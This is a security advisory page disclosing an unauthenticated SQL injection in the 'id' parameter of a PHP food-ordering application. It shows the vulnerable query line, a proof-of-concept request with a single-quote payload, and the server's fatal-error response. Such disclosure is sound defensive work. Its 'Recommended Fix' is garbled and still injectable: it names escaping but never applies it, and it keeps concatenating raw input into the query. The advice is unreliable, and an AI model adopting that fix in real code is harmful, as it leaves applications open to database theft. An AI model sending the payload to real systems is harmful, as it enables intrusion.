Simple Online Food Ordering System 1.0 id SQL Injection (Unauthenticated)

2020.10.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated) # Google Dork: N/A # Date: 2020-09-22 # Exploit Author: Eren 'Aporlorxl23' Şimşek # Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip # Version: 1.0 # Tested on: Linux - XAMPP Server # CVE : N/A # Vulnerable Source Code: # /view_prod.php # [3] $qry = $conn->query("SELECT * FROM product_list where id = ".$_GET['id'])->fetch_array(); # PoC: # Request: GET /view_prod.php?id=' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: tr,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close # Response: HTTP/1.1 200 OK Date: Tue, 22 Sep 2020 20:44:48 GMT Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3 X-Powered-By: PHP/7.4.7 Content-Length: 234 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Fatal error</b>: Uncaught Error: Call to a member function fetch_array() on bool in /opt/lampp/htdocs/view_prod.php:3 Stack trace: #0 {main} thrown in <b>/opt/lampp/htdocs/view_prod.php</b> on line <b>3</b><br /> # As You Can See Here PHP Fatal Error Because # $qry = $conn->query("SELECT * FROM product_list where id = "')->fetch_array(); # id Value ' This is Wrong Syntax. # Recommended Fix: You Will Use `mysqli_real_escape_string` On id . And query Will Same With : $qry = $conn->query('SELECT * FROM product_list where id ="$_GET['id']"')->fetch_array(); Because Here Not Used "" This is Imported.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top